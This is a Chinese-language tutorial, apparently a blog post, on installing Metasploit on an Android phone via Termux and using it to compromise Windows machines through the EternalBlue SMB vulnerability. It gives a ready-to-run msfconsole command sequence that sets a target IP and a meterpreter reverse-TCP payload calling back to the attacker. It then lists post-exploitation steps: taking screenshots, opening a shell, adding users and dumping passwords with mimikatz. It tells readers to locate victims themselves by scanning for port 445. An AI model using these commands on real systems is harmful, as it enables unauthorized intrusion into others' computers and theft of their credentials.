注意!!!请勿用于非法用途!发生任何事都与本人无关不负任何责任!!!
简介
Metasploit是一款强大的渗透测试平台,其中包括了很多渗透测试利器,简称MSF。今天我就演示如何在手机上运行Metasploit并且实现"永恒之蓝"渗透内网windows主机!由于安卓平台的特殊性,要在Termux上部署MSF!
重要提醒
强烈建议用联通4g网络安装MSF,安装出错90%都是由于网络问题导致的!!!
步骤
点击下载并安装Termux.apk,第一次启动会下载系统,加载速度由网络决定。(如果不翻蔷下载会很慢很慢)
执行apt update && apt upgrade命令,Termux将会更新软件源并升级软件包。(遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可)
执行apt install curl proot命令,Termux将会安装curl。(遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可)
执行
curl -L https://Auxilus.github.io/metasploit.sh > metasploit.sh
命令,Termux将会下载MSF安装脚本。
执行
chmod +x metasploit.sh && ./metasploit.sh
命令,Termux将会自动安装MSF。(在此过程中会提示安装多个软件包,输入y回车即可,请耐心等待!我安装的时候整整花了半个小时!)
以上所有步骤完成之后,执行msfconsole命令即可启动metasploit神器!(启动速度有点慢,一般不会超过3分钟)——启动界面如下图:
实战演练
到这里Metasploit的安装就完成了!下面我演示一下攻击windows的"永恒之蓝"漏洞:
第一步,首先要找到一个开着445端口的靶机的ip,你可以用nmap扫描网段,也可以自己找,找ip的方法靠自己。这里我就示范一下攻击10.1.100.181这台windows,先启动msf,然后执行下面的命令:
use exploit/windows/smb/ms17_010_eternalblue
set rhost 10.1.100.181
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.13.175.191
set lport 5555
exploit
解释一下语句的作用
use exploit/windows/smb/ms17_010_eternalblue
就是使用ms17_010_eternalblue永恒之蓝模块
set rhost 10.1.100.181
就是设置靶机ip地址
set lhost 10.13.175.191
就是设置本机ip地址,你需要使用就修改两个ip地址就行了,其它不用修改。——入侵成功如下图:
现在这台windows就相当于被我拿下了,这时候执行screenshot可以获得该电脑的截图,执行shell可以在该电脑运行cmd命令,并可以添加用户,执行load mimikatz加载密码模块,使用命令wdigest获取电脑的账户密码,还有开启远程端口直接用自己的电脑控制那台windows等等等等,此处省略一万字。这里我就拿永恒之蓝作为例子,更多技术你们自己去谷歌学习吧!